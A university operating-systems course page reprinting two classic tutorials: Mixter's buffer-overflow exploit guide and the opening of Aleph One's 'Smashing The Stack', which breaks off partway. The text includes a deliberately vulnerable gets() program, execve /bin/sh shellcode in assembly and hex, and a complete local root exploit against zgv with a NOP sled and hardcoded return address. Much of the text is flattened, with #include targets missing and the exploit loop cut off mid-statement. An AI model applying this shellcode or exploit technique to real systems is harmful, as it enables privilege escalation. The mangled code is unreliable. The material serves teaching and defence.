COP 4610: OPERATING SYSTEMS & CONCURRENT PROGRAMMING

Writing Buffer and Heap Overflow Exploits

 

The following articles were was found on the Web, using the Google search engine with keywords "buffer overflow exploit". They were all posted at http://www.11a.nu/stack/exploit.txt". A cleaner version of the first article, in HTML, was posted at http://www.securiteam.com/securityreviews/5OP0B006UQ.html.

Article 1

      Writing buffer overflow exploits - a tutorial for beginners
      ===========================================================

    Security papers - members.tripod.com/mixtersecurity/papers.html

Buffer overflows in user input dependent buffers have become one of
the biggest security hazards on the internet and to modern computing
in general. This is because such an error can easily be made at
programming level, and while invisible for the user who does not
understand or cannot acquire the source code, many of those errors are
easy to exploit. This paper makes an attempt to teach the novice -
average C programmer how an overflow condition can be proven to be
exploitable.

Mixter

_______________________________________________________________________________

1. Memory

Note: The way I describe it here, memory for a process is organized on most
      computers, however it depends on the type of processor architecture.
      This example is for x86 and also roughly applies to sparc.

The principle of exploiting a buffer overflow is to overwrite parts of
memory which aren't supposed to be overwritten by arbitrary input and
making the process execute this code. To see how and where an overflow
takes place, lets take a look at how memory is organized.  A page is a
part of memory that uses its own relative addressing, meaning the
kernel allocates initial memory for the process, which it can then
access without having to know where the memory is physically located
in RAM. The processes memory consists of three sections:

 - code segment, data in this segment are assembler instructions that
   the processor executes. The code execution is non-linear, it can skip
   code, jump, and call functions on certain conditions. Therefore, we
   have a pointer called EIP, or instruction pointer. The address where
   EIP points to always contains the code that will be executed next.

 - data segment, space for variables and dynamic buffers

 - stack segment, which is used to pass data (arguments) to functions
   and as a space for variables of functions. The bottom (start) of the
   stack usually resides at the very end of the virtual memory of a page,
   and grows down. The assembler command PUSHL will add to the top of the
   stack, and POPL will remove one item from the top of the stack and put
   it in a register. For accessing the stack memory directly, there is
   the stack pointer ESP that points at the top (lowest memory address)
   of the stack.

_______________________________________________________________________________

2. Functions

A function is a piece of code in the code segment, that is called,
performs a task, and then returns to the previous thread of execution.
Optionally, arguments can be passed to a function. In assembler, it
usually looks like this (very simple example, just to get the idea):

memory address		code
0x8054321 	pushl $0x0
0x8054322		call $0x80543a0 
0x8054327		ret
0x8054328		leave
...
0x80543a0 	popl %eax
0x80543a1		addl $0x1337,%eax
0x80543a4		ret

What happens here? The main function calls function(0); The variable
is 0, main pushes it onto the stack, and calls the function. The
function gets the variable from the stack using popl.  After
finishing, it returns to 0x8054327. Commonly, the main function would
always push register EBP on the stack, which the function stores, and
restores after finishing. This is the frame pointer concept, that
allows the function to use own offsets for addressing, which is mostly
uninteresting while dealing with exploits, because the function will
not return to the original execution thread anyways. :-) We just have
to know what the stack looks like. At the top, we have the internal
buffers and variables of the function. After this, there is the saved
EBP register (32 bit, which is 4 bytes), and then the return address,
which is again 4 bytes. Further down, there are the arguments passed
to the function, which are uninteresting to us.  In this case, our
return address is 0x8054327. It is automatically stored on the stack
when the function is called. This return address can be overwritten,
and changed to point to any point in memory, if there is an overflow
somewhere in the code.

_______________________________________________________________________________

3. Example of an exploitable program

Lets assume that we exploit a function like this:

void lame (void) { char small[30]; gets (small); printf("%s\n", small); }
main() { lame (); return 0; }

Compile and disassemble it:
# cc -ggdb blah.c -o blah
/tmp/cca017401.o: In function `lame':
/root/blah.c:1: the `gets' function is dangerous and should not be used.
# gdb blah
/* short explanation: gdb, the GNU debugger is used here to read the
   binary file and disassemble it (translate bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8 
: pushl %ebp 0x80484c9 : movl %esp,%ebp 0x80484cb : call 0x80484a0 0x80484d0 : leave 0x80484d1 : ret (gdb) disas lame Dump of assembler code for function lame: /* saving the frame pointer onto the stack right before the ret address */ 0x80484a0 : pushl %ebp 0x80484a1 : movl %esp,%ebp /* enlarge the stack by 0x20 or 32. our buffer is 30 characters, but the memory is allocated 4byte-wise (because the processor uses 32bit words) this is the equivalent to: char small[30]; */ 0x80484a3 : subl $0x20,%esp /* load a pointer to small[30] (the space on the stack, which is located at virtual address 0xffffffe0(%ebp)) on the stack, and call the gets function: gets(small); */ 0x80484a6 : leal 0xffffffe0(%ebp),%eax 0x80484a9 : pushl %eax 0x80484aa : call 0x80483ec 0x80484af : addl $0x4,%esp /* load the address of small and the address of "%s\n" string on stack and call the print function: printf("%s\n", small); */ 0x80484b2 : leal 0xffffffe0(%ebp),%eax 0x80484b5 : pushl %eax 0x80484b6 : pushl $0x804852c 0x80484bb : call 0x80483dc 0x80484c0 : addl $0x8,%esp /* get the return address, 0x80484d0, from stack and return to that address. you don't see that explicitly here because it is done by the CPU as 'ret' */ 0x80484c3 : leave 0x80484c4 : ret End of assembler dump. 3a. Overflowing the program # ./blah xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx # ./blah xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx <- user input xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Segmentation fault (core dumped) # gdb blah core (gdb) info registers eax: 0x24 36 ecx: 0x804852f 134513967 edx: 0x1 1 ebx: 0x11a3c8 1156040 esp: 0xbffffdb8 -1073742408 ebp: 0x787878 7895160 ^^^^^^ EBP is 0x787878, this means that we have written more data on the stack than the input buffer could handle. 0x78 is the hex representation of 'x'. The process had a buffer of 32 bytes maximum size. We have written more data into memory than allocated for user input and therefore overwritten EBP and the return address with 'xxxx', and the process tried to resume execution at address 0x787878, which caused it to get a segmentation fault. 3b. Changing the return address Lets try to exploit the program to return to lame() instead of return. We have to change return address 0x80484d0 to 0x80484cb, that is all. In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET Here is a simple program to put the 4byte return address into a 1byte character buffer: main() { int i=0; char buf[44]; for (i=0;i<=40;i+=4) *(long *) &buf[i] = 0x80484cb; puts(buf); } # ret ËËËËËËËËËËË, # (ret;cat)|./blah test <- user input ËËËËËËËËËËË,test test <- user input test Here we are, the program went through the function two times. If an overflow is present, the return address of functions can be changed to alter the programs execution thread. _______________________________________________________________________________ 4. Shellcode To keep it simple, shellcode is simply assembler commands, which we write on the stack and then change the retun address to return to the stack. Using this method, we can insert code into a vulnerable process and then execute it right on the stack. So, lets generate insertable assembler code to run a shell. A common system call is execve(), which loads and runs any binary, terminating execution of the current process. The manpage gives us the usage: int execve (const char *filename, char *const argv [], char *const envp[]); Lets get the details of the system call from glibc2: # gdb /lib/libc.so.6 (gdb) disas execve Dump of assembler code for function execve: 0x5da00 : pushl %ebx /* this is the actual syscall. before a program would call execve, it would push the arguments in reverse order on the stack: **envp, **argv, *filename */ /* put address of **envp into edx register */ 0x5da01 : movl 0x10(%esp,1),%edx /* put address of **argv into ecx register */ 0x5da05 : movl 0xc(%esp,1),%ecx /* put address of *filename into ebx register */ 0x5da09 : movl 0x8(%esp,1),%ebx /* put 0xb in eax register; 0xb == execve in the internal system call table */ 0x5da0d : movl $0xb,%eax /* give control to kernel, to execute execve instruction */ 0x5da12 : int $0x80 0x5da14 : popl %ebx 0x5da15 : cmpl $0xfffff001,%eax 0x5da1a : jae 0x5da1d <__syscall_error> 0x5da1c : ret End of assembler dump. 4a. making the code portable We have to apply a trick to be able to make shellcode without having to reference the arguments in memory the conventional way, by giving their exact address on the memory page, which can only be done at compile time. Once we can estimate the size of the shellcode, we can use the instructions jmp and call to go a specified number of bytes back or forth in the execution thread. Why use a call? We have the opportunity that a CALL will automatically store the return address on the stack, the return address being the next 4 bytes after the CALL instruction. By placing a variable right behind the call, we indirectly push its address on the stack without having to know it. 0 jmp (skip Z bytes forward) 2 popl %esi ... put function(s) here ... Z call <-Z+2> (skip 2 less than Z bytes backward, to POPL) Z+5 .string (first variable) (Note: If you're going to write code more complex than for spawning a simple shell, you can put more than one .string behind the code. You know the size of those strings and can therefore calculate their relative locations once you know where the first string is located.) 4b. the shellcode global code_start /* we'll need this later, dont mind it */ global code_end .data code_start: jmp 0x17 popl %esi movl %esi,0x8(%esi) /* put address of **argv behind shellcode, 0x8 bytes behind it so a /bin/sh has place */ xorl %eax,%eax /* put 0 in %eax */ movb %eax,0x7(%esi) /* put terminating 0 after /bin/sh string */ movl %eax,0xc(%esi) /* another 0 to get the size of a long word */ my_execve: movb $0xb,%al /* execve( */ movl %esi,%ebx /* "/bin/sh", */ leal 0x8(%esi),%ecx /* & of "/bin/sh", */ xorl %edx,%edx /* NULL */ int $0x80 /* ); */ call -0x1c .string "/bin/shX" /* X is overwritten by movb %eax,0x7(%esi) */ code_end: (The relative offsets 0x17 and -0x1c can be gained by putting in 0x0, compiling, disassembling and then looking at the shell codes size.) This is already working shellcode, though very minimal. You should at least disassemble the exit() syscall and attach it (before the 'call'). The real art of making shellcode also consists of avoiding any binary zeroes in the code (indicates end of input/buffer very often) and modify it for example, so the binary code does not contain control or lower characters, which would get filtered out by some vulnerable programs. Most of this stuff is done by self-modifying code, like we had in the movb %eax,0x7(%esi) instruction. We replaced the X with \0, but without having a \0 in the shellcode initially... Lets test this code... save the above code as code.S (remove comments) and the following file as code.c: extern void code_start(); extern void code_end(); #include main() { ((void (*)(void)) code_start)(); } # cc -o code code.S code.c # ./code bash# You can now convert the shellcode to a hex char buffer. Best way to do this is, print it out: #include extern void code_start(); extern void code_end(); main() { fprintf(stderr,"%s",code_start); } and parse it through aconv -h or bin2c.pl, those tools can be found at: http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity _______________________________________________________________________________ 5. Writing an exploit Let us take a look at how to change the return address to point to shellcode put on the stack, and write a sample exploit. We will take zgv, because that is one of the easiest things to exploit out there :) # export HOME=`perl -e 'printf "a" x 2000'` # zgv Segmentation fault (core dumped) # gdb /usr/bin/zgv core #0 0x61616161 in ?? () (gdb) info register esp esp: 0xbffff574 -1073744524 Well, this is the top of the stack at crash time. It is safe to presume that we can use this as return address to our shellcode. We will now add some NOP (no operation) instructions before our buffer, so we don't have to be 100% correct regarding the prediction of the exact start of our shellcode in memory (or even brute forcing it). The function will return onto the stack somewhere before our shellcode, work its way through the NOPs to the inital JMP command, jump to the CALL, jump back to the popl, and run our code on the stack. Remember, the stack looks like this: at the lowest memory address, the top of the stack where ESP points to, the initial variables are stored, namely the buffer in zgv that stores the HOME environment variable. After that, we have the saved EBP(4bytes) and the return address of the previous function. We must write 8 bytes or more behind the buffer to overwrite the return address with our new address on the stack. The buffer in zgv is 1024 bytes big. You can find that out by glancing at the code, or by searching for the initial subl $0x400,%esp (=1024) in the vulnerable function. We will now put all those parts together in the exploit: 5a. Sample zgv exploit /* zgv v3.0 exploit by Mixter buffer overflow tutorial - http://1337.tsx.org sample exploit, works for example with precompiled redhat 5.x/suse 5.x/redhat 6.x/slackware 3.x linux binaries */ #include #include #include /* This is the minimal shellcode from the tutorial */ static char shellcode[]= "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d" "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58"; #define NOP 0x90 #define LEN 1032 #define RET 0xbffff574 int main() { char buffer[LEN]; long retaddr = RET; int i; fprintf(stderr,"using address 0x%lx\n",retaddr); /* this fills the whole buffer with the return address, see 3b) */ for (i=0;i function() -> strcpy(smallbuffer,getenv("HOME")); At this point, zgv fails to do bounds checking, writes beyond smallbuffer, and the return address to main is overwritten with the return address on the stack. function() does leave/ret and the EIP points onto the stack: 0xbffff574 nop 0xbffff575 nop 0xbffff576 nop 0xbffff577 jmp $0x24 1 0xbffff579 popl %esi 3 <--\ | [... shellcode starts here ...] | | 0xbffff59b call -$0x1c 2 <--/ 0xbffff59e .string "/bin/shX" Lets test the exploit... # cc -o zgx zgx.c # ./zgx using address 0xbffff574 bash# 5b. further tips on writing exploits There are a lot of programs which are tough to exploit, but nonetheless vulnerable. However, there are a lot of tricks you can do to get behind filtering and such. There are also other overflow techniques which do not necessarily include changing the return address at all or only the return address. There are so-called pointer overflows, where a pointer that a function allocates can be overwritten by an overflow, altering the programs execution flow (an example is the RoTShB bind 4.9 exploit), and exploits where the return address points to the shells environment pointer, where the shellcode is located instead of being on the stack (this defeats very small buffers, and Non-executable stack patches, and can fool some security programs, though it can only be performed locally). Another important subject for the skilled shellcode author is radically self-modifying code, which initially only consists of printable, non-white upper case characters, and then modifies itself to put functional shellcode on the stack which it executes, etc. You should never, ever have any binary zeroes in your shell code, because it will most possibly not work if it contains any. But discussing how to sublimate certain assembler commands with others would go beyond the scope of this paper. I also suggest reading the other great overflow howto's out there, written by aleph1, Taeoh Oh and mudge. 5c. important note You will NOT be able to use this tutorial on Windows or Macintosh. Do NOT ask me for cc.exe and gdb.exe either! =oP _______________________________________________________________________________ 6. Conclusions We have learned, that once an overflow is present which is user dependent, it can be exploited about 90% of the time, even though exploiting some situations is difficult and takes some skill. Why is it important to write exploits? Because ignorance is omniscient in the software industry. There have already been reports of vulnerabilities due to buffer overflows in software, though the software has not been updated, or the majority of users didn't update, because the vulnerability was hard to exploit and nobody believed it created a security risk. Then, an exploit actually comes out, proves and practically enables a program to be exploitable, and there is usually a big (neccessary) hurry to update it. As for the programmer (you), it is a hard task to write secure programs, but it should be taken very serious. This is a specially large concern when writing servers, any type of security programs, or programs that are suid root, or designed to be run by root, any special accounts, or the system itself. Apply bounds checking (strn*, sn*, functions instead of sprintf etc.), prefer allocating buffers of a dynamic, input-dependent, size, be careful on for/while/etc. loops that gather data and stuff it into a buffer, and generally handle user input with very much care are the main principles I suggest. There has also been made notable effort of the security industry to prevent overflow problems with techniques like non-executable stack, suid wrappers, guard programs that check return addresses, bounds checking compilers, and so on. You should make use of those techniques where possible, but do not fully rely on them. Do not assume to be safe at all if you run a vanilla two-year old UNIX distribution without updates, but overflow protection or (even more stupid) firewalling/IDS. It cannot assure security, if you continue to use insecure programs because _all_ security programs are _software_ and can contain vulnerabilities themselves, or at least not be perfect. If you apply frequent updates _and_ security measures, you can still not expect to be secure, _but_ you can hope. :-) Mixter http://members.tripod.com/mixtersecurity
 

Article 2

                               .oO Phrack 49 Oo.

                          Volume Seven, Issue Forty-Nine
                                     
                                  File 14 of 16

                      BugTraq, r00t, and Underground.Org
                                   bring you

                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
                     Smashing The Stack For Fun And Profit
                     XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

                                 by Aleph One
                             aleph1@underground.org

	`smash the stack` [C programming] n. On many C implementations
	it is possible to corrupt the execution stack by writing past
	the end of an array declared auto in a routine.  Code that does
	this is said to smash the stack, and can cause return from the
	routine to jump to a random address.  This can produce some of
	the most insidious data-dependent bugs known to mankind.
	Variants include trash the stack, scribble the stack, mangle
	the stack; the term mung the stack is not used, as this is
	never done intentionally. See spam; see also alias bug,
	fandango on core, memory leak, precedence lossage, overrun screw.


                                 Introduction
                                 ~~~~~~~~~~~~

   Over the last few months there has been a large increase of buffer
overflow vulnerabilities being both discovered and exploited.  Examples
of these are syslog, splitvt, sendmail 8.7.5, Linux/FreeBSD mount, Xt 
library, at, etc.  This paper attempts to explain what buffer overflows 
are, and how their exploits work.

   Basic knowledge of assembly is required.  An understanding of virtual 
memory concepts, and experience with gdb are very helpful but not necessary.
We also assume we are working with an Intel x86 CPU, and that the operating 
system is Linux.

   Some basic definitions before we begin: A buffer is simply a contiguous 
block of computer memory that holds multiple instances of the same data 
type.  C programmers normally associate with the word buffer arrays. Most 
commonly, character arrays.  Arrays, like all variables in C, can be 
declared either static or dynamic.  Static variables are allocated at load 
time on the data segment.  Dynamic variables are allocated at run time on 
the stack. To overflow is to flow, or fill over the top, brims, or bounds. 
We will concern ourselves only with the overflow of dynamic buffers, otherwise
known as stack-based buffer overflows.


                          Process Memory Organization
                          ~~~~~~~~~~~~~~~~~~~~~~~~~~~

   To understand what stack buffers are we must first understand how a
process is organized in memory.  Processes are divided into three regions:
Text, Data, and Stack.  We will concentrate on the stack region, but first
a small overview of the other regions is in order.

   The text region is fixed by the program and includes code (instructions)
and read-only data.  This region corresponds to the text section of the
executable file.  This region is normally marked read-only and any attempt to
write to it will result in a segmentation violation.

   The data region contains initialized and uninitialized data.  Static
variables are stored in this region.  The data region corresponds to the
data-bss sections of the executable file.  Its size can be changed with the
brk(2) system call.  If the expansion of the bss data or the user stack
exhausts available memory, the process is blocked and is rescheduled to
run again with a larger memory space. New memory is added between the data
and stack segments.

                             /------------------\  lower
                             |                  |  memory
                             |       Text       |  addresses
                             |                  |
                             |------------------|
                             |   (Initialized)  |
                             |        Data      |
                             |  (Uninitialized) |
                             |------------------|
                             |                  |
                             |       Stack      |  higher
                             |                  |  memory
                             \------------------/  addresses

                         Fig. 1 Process Memory Regions


                               What Is A Stack?
                               ~~~~~~~~~~~~~~~~

   A stack is an abstract data type frequently used in computer science.  A
stack of objects has the property that the last object placed on the stack
will be the first object removed.  This property is commonly referred to as
last in, first out queue, or a LIFO.

   Several operations are defined on stacks.  Two of the most important are
PUSH and POP.  PUSH adds an element at the top of the stack.  POP, in 
contrast, reduces the stack size by one by removing the last element at the 
top of the stack.


                            Why Do We Use A Stack?
                            ~~~~~~~~~~~~~~~~~~~~~~

   Modern computers are designed with the need of high-level languages in
mind.  The most important technique for structuring programs introduced by
high-level languages is the procedure or function.  From one point of view, a
procedure call alters the flow of control just as a jump does, but unlike a
jump, when finished performing its task, a function returns control to the 
statement or instruction following the call.  This high-level abstraction
is implemented with the help of the stack.

  The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from the
function.


                               The Stack Region
                               ~~~~~~~~~~~~~~~~

   A stack is a contiguous block of memory containing data.  A register called
the stack pointer (SP) points to the top of the stack.  The bottom of the 
stack is at a fixed address.  Its size is dynamically adjusted by the kernel 
at run time. The CPU implements instructions to PUSH onto and POP off of the 
stack. 

   The stack consists of logical stack frames that are pushed when calling a
function and popped when returning.  A stack frame contains the parameters to 
a function, its local variables, and the data necessary to recover the 
previous stack frame, including the value of the instruction pointer at the 
time of the function call.

   Depending on the implementation the stack will either grow down (towards
lower memory addresses), or up.  In our examples we'll use a stack that grows
down.  This is the way the stack grows on many computers including the Intel, 
Motorola, SPARC and MIPS processors.  The stack pointer (SP) is also
implementation dependent.  It may point to the last address on the stack, or 
to the next free available address after the stack.  For our discussion we'll
assume it points to the last address on the stack.

   In addition to the stack pointer, which points to the top of the stack
(lowest numerical address), it is often convenient to have a frame pointer
(FP) which points to a fixed location within a frame.  Some texts also refer
to it as a local base pointer (LB).  In principle, local variables could be
referenced by giving their offsets from SP.  However, as words are pushed onto
the stack and popped from the stack, these offsets change.  Although in some
cases the compiler can keep track of the number of words on the stack and
thus correct the offsets, in some cases it cannot, and in all cases
considerable administration is required.  Futhermore, on some machines, such
as Intel-based processors, accessing a variable at a known distance from SP
requires multiple instructions.

   Consequently, many compilers use a second register, FP, for referencing
both local variables and parameters because their distances from FP do
not change with PUSHes and POPs.  On Intel CPUs, BP (EBP) is used for this 
purpose.  On the Motorola CPUs, any address register except A7 (the stack 
pointer) will do.  Because the way our stack grows, actual parameters have 
positive offsets and local variables have negative offsets from FP.

   The first thing a procedure must do when called is save the previous FP
(so it can be restored at procedure exit).  Then it copies SP into FP to 
create the new FP, and advances SP to reserve space for the local variables. 
This code is called the procedure prolog.  Upon procedure exit, the stack 
must be cleaned up again, something called the procedure epilog.  The Intel 
ENTER and LEAVE instructions and the Motorola LINK and UNLINK instructions, 
have been provided to do most of the procedure prolog and epilog work 
efficiently. 

   Let us see what the stack looks like in a simple example:

example1.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
}

void main() {
  function(1,2,3);
}
------------------------------------------------------------------------------

   To understand what the program does to call function() we compile it with
gcc using the -S switch to generate assembly code output:

$ gcc -S -o example1.s example1.c

   By looking at the assembly language output we see that the call to
function() is translated to:

        pushl $3
        pushl $2
        pushl $1
        call function

    This pushes the 3 arguments to function backwards into the stack, and
calls function().  The instruction 'call' will push the instruction pointer
(IP) onto the stack.  We'll call the saved IP the return address (RET).  The
first thing done in function is the procedure prolog:

        pushl %ebp
        movl %esp,%ebp
        subl $20,%esp

   This pushes EBP, the frame pointer, onto the stack.  It then copies the
current SP onto EBP, making it the new FP pointer.  We'll call the saved FP
pointer SFP.  It then allocates space for the local variables by subtracting
their size from SP.

   We must remember that memory can only be addressed in multiples of the
word size.  A word in our case is 4 bytes, or 32 bits.  So our 5 byte buffer
is really going to take 8 bytes (2 words) of memory, and our 10 byte buffer
is going to take 12 bytes (3 words) of memory.  That is why SP is being
subtracted by 20.  With that in mind our stack looks like this when
function() is called (each space represents a byte):


bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]
	   
top of                                                            bottom of
stack                                                                 stack


                               Buffer Overflows
                               ~~~~~~~~~~~~~~~~

   A buffer overflow is the result of stuffing more data into a buffer than
it can handle.  How can this often found programming error can be taken
advantage to execute arbitrary code?  Lets look at another example:

example2.c
------------------------------------------------------------------------------
void function(char *str) {
   char buffer[16];

   strcpy(buffer,str);
}

void main() {
  char large_string[256];
  int i;

  for( i = 0; i < 255; i++)
    large_string[i] = 'A';

  function(large_string);
}
------------------------------------------------------------------------------

   This is program has a function with a typical buffer overflow coding
error.  The function copies a supplied string without bounds checking by
using strcpy() instead of strncpy().  If you run this program you will get a
segmentation violation.  Lets see what its stack looks when we call function:


bottom of                                                            top of
memory                                                               memory
                  buffer            sfp   ret   *str
<------          [                ][    ][    ][    ]

top of                                                            bottom of
stack                                                                 stack


   What is going on here?  Why do we get a segmentation violation?  Simple.
strcpy() is coping the contents of *str (larger_string[]) into buffer[]
until a null character is found on the string.  As we can see buffer[] is
much smaller than *str.  buffer[] is 16 bytes long, and we are trying to stuff
it with 256 bytes.  This means that all 250 bytes after buffer in the stack
are being overwritten.  This includes the SFP, RET, and even *str!  We had 
filled large_string with the character 'A'.  It's hex character value
is 0x41.  That means that the return address is now 0x41414141.  This is
outside of the process address space.  That is why when the function returns
and tries to read the next instruction from that address you get a 
segmentation violation.

   So a buffer overflow allows us to change the return address of a function.
In this way we can change the flow of execution of the program.  Lets go back
to our first example and recall what the stack looked like:


bottom of                                                            top of
memory                                                               memory
           buffer2       buffer1   sfp   ret   a     b     c
<------   [            ][        ][    ][    ][    ][    ][    ]

top of                                                            bottom of
stack                                                                 stack


   Lets try to modify our first example so that it overwrites the return
address, and demonstrate how we can make it execute arbitrary code.  Just
before buffer1[] on the stack is SFP, and before it, the return address.
That is 4 bytes pass the end of buffer1[].  But remember that buffer1[] is
really 2 word so its 8 bytes long.  So the return address is 12 bytes from
the start of buffer1[].  We'll modify the return value in such a way that the
assignment statement 'x = 1;' after the function call will be jumped.  To do
so we add 8 bytes to the return address.  Our code is now:

example3.c:
------------------------------------------------------------------------------
void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
   int *ret;

   ret = buffer1 + 12;
   (*ret) += 8;
}

void main() {
  int x;

  x = 0;
  function(1,2,3);
  x = 1;
  printf("%d\n",x);
}
------------------------------------------------------------------------------

   What we have done is add 12 to buffer1[]'s address.  This new address is
where the return address is stored.  We want to skip pass the assignment to
the printf call.  How did we know to add 8 to the return address?  We used a
test value first (for example 1), compiled the program, and then started gdb:

------------------------------------------------------------------------------
[aleph1]$ gdb example3
GDB is free software and you are welcome to distribute copies of it
 under certain conditions; type "show copying" to see the conditions.
There is absolutely no warranty for GDB; type "show warranty" for details.
GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc...
(no debugging symbols found)...
(gdb) disassemble main
Dump of assembler code for function main:
0x8000490 
: pushl %ebp 0x8000491 : movl %esp,%ebp 0x8000493 : subl $0x4,%esp 0x8000496 : movl $0x0,0xfffffffc(%ebp) 0x800049d : pushl $0x3 0x800049f : pushl $0x2 0x80004a1 : pushl $0x1 0x80004a3 : call 0x8000470 0x80004a8 : addl $0xc,%esp 0x80004ab : movl $0x1,0xfffffffc(%ebp) 0x80004b2 : movl 0xfffffffc(%ebp),%eax 0x80004b5 : pushl %eax 0x80004b6 : pushl $0x80004f8 0x80004bb : call 0x8000378 0x80004c0 : addl $0x8,%esp 0x80004c3 : movl %ebp,%esp 0x80004c5 : popl %ebp 0x80004c6 : ret 0x80004c7 : nop ------------------------------------------------------------------------------ We can see that when calling function() the RET will be 0x8004a8, and we want to jump past the assignment at 0x80004ab. The next instruction we want to execute is the at 0x8004b2. A little math tells us the distance is 8 bytes. Shell Code ~~~~~~~~~~ So now that we know that we can modify the return address and the flow of execution, what program do we want to execute? In most cases we'll simply want the program to spawn a shell. From the shell we can then issue other commands as we wish. But what if there is no such code in the program we are trying to exploit? How can we place arbitrary instruction into its address space? The answer is to place the code with are trying to execute in the buffer we are overflowing, and overwrite the return address so it points back into the buffer. Assuming the stack starts at address 0xFF, and that S stands for the code we want to execute the stack would then look like this: bottom of DDDDDDDDEEEEEEEEEEEE EEEE FFFF FFFF FFFF FFFF top of memory 89ABCDEF0123456789AB CDEF 0123 4567 89AB CDEF memory buffer sfp ret a b c <------ [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03] ^ | |____________________________| top of bottom of stack stack The code to spawn a shell in C looks like: shellcode.c ----------------------------------------------------------------------------- #include void main() { char *name[2]; name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); } ------------------------------------------------------------------------------ To find out what does it looks like in assembly we compile it, and start up gdb. Remember to use the -static flag. Otherwise the actual code the for the execve system call will not be included. Instead there will be a reference to dynamic C library that would normally would be linked in at load time. ------------------------------------------------------------------------------ [aleph1]$ gcc -o shellcode -ggdb -static shellcode.c [aleph1]$ gdb shellcode GDB is free software and you are welcome to distribute copies of it under certain conditions; type "show copying" to see the conditions. There is absolutely no warranty for GDB; type "show warranty" for details. GDB 4.15 (i586-unknown-linux), Copyright 1995 Free Software Foundation, Inc... (gdb) disassemble main Dump of assembler code for function main: 0x8000130
: pushl %ebp 0x8000131 : movl %esp,%ebp 0x8000133 : subl $0x8,%esp 0x8000136 : movl $0x80027b8,0xfffffff8(%ebp) 0x800013d : movl $0x0,0xfffffffc(%ebp) 0x8000144 : pushl $0x0 0x8000146 : leal 0xfffffff8(%ebp),%eax 0x8000149 : pushl %eax 0x800014a : movl 0xfffffff8(%ebp),%eax 0x800014d : pushl %eax 0x800014e : call 0x80002bc <__execve> 0x8000153 : addl $0xc,%esp 0x8000156 : movl %ebp,%esp 0x8000158 : popl %ebp 0x8000159 : ret End of assembler dump. (gdb) disassemble __execve Dump of assembler code for function __execve: 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+1>: movl %esp,%ebp 0x80002bf <__execve+3>: pushl %ebx 0x80002c0 <__execve+4>: movl $0xb,%eax 0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx 0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx 0x80002cb <__execve+15>: movl 0x10(%ebp),%edx 0x80002ce <__execve+18>: int $0x80 0x80002d0 <__execve+20>: movl %eax,%edx 0x80002d2 <__execve+22>: testl %edx,%edx 0x80002d4 <__execve+24>: jnl 0x80002e6 <__execve+42> 0x80002d6 <__execve+26>: negl %edx 0x80002d8 <__execve+28>: pushl %edx 0x80002d9 <__execve+29>: call 0x8001a34 <__normal_errno_location> 0x80002de <__execve+34>: popl %edx 0x80002df <__execve+35>: movl %edx,(%eax) 0x80002e1 <__execve+37>: movl $0xffffffff,%eax 0x80002e6 <__execve+42>: popl %ebx 0x80002e7 <__execve+43>: movl %ebp,%esp 0x80002e9 <__execve+45>: popl %ebp 0x80002ea <__execve+46>: ret 0x80002eb <__execve+47>: nop End of assembler dump. ------------------------------------------------------------------------------ Lets try to understand what is going on here. We'll start by studying main: ------------------------------------------------------------------------------ 0x8000130
: pushl %ebp 0x8000131 : movl %esp,%ebp 0x8000133 : subl $0x8,%esp This is the procedure prelude. It first saves the old frame pointer, makes the current stack pointer the new frame pointer, and leaves space for the local variables. In this case its: char *name[2]; or 2 pointers to a char. Pointers are a word long, so it leaves space for two words (8 bytes). 0x8000136 : movl $0x80027b8,0xfffffff8(%ebp) We copy the value 0x80027b8 (the address of the string "/bin/sh") into the first pointer of name[]. This is equivalent to: name[0] = "/bin/sh"; 0x800013d : movl $0x0,0xfffffffc(%ebp) We copy the value 0x0 (NULL) into the seconds pointer of name[]. This is equivalent to: name[1] = NULL; The actual call to execve() starts here. 0x8000144 : pushl $0x0 We push the arguments to execve() in reverse order onto the stack. We start with NULL. 0x8000146 : leal 0xfffffff8(%ebp),%eax We load the address of name[] into the EAX register. 0x8000149 : pushl %eax We push the address of name[] onto the stack. 0x800014a : movl 0xfffffff8(%ebp),%eax We load the address of the string "/bin/sh" into the EAX register. 0x800014d : pushl %eax We push the address of the string "/bin/sh" onto the stack. 0x800014e : call 0x80002bc <__execve> Call the library procedure execve(). The call instruction pushes the IP onto the stack. ------------------------------------------------------------------------------ Now execve(). Keep in mind we are using a Intel based Linux system. The syscall details will change from OS to OS, and from CPU to CPU. Some will pass the arguments on the stack, others on the registers. Some use a software interrupt to jump to kernel mode, others use a far call. Linux passes its arguments to the system call on the registers, and uses a software interrupt to jump into kernel mode. ------------------------------------------------------------------------------ 0x80002bc <__execve>: pushl %ebp 0x80002bd <__execve+1>: movl %esp,%ebp 0x80002bf <__execve+3>: pushl %ebx The procedure prelude. 0x80002c0 <__execve+4>: movl $0xb,%eax Copy 0xb (11 decimal) onto the stack. This is the index into the syscall table. 11 is execve. 0x80002c5 <__execve+9>: movl 0x8(%ebp),%ebx Copy the address of "/bin/sh" into EBX. 0x80002c8 <__execve+12>: movl 0xc(%ebp),%ecx Copy the address of name[] into ECX. 0x80002cb <__execve+15>: movl 0x10(%ebp),%edx Copy 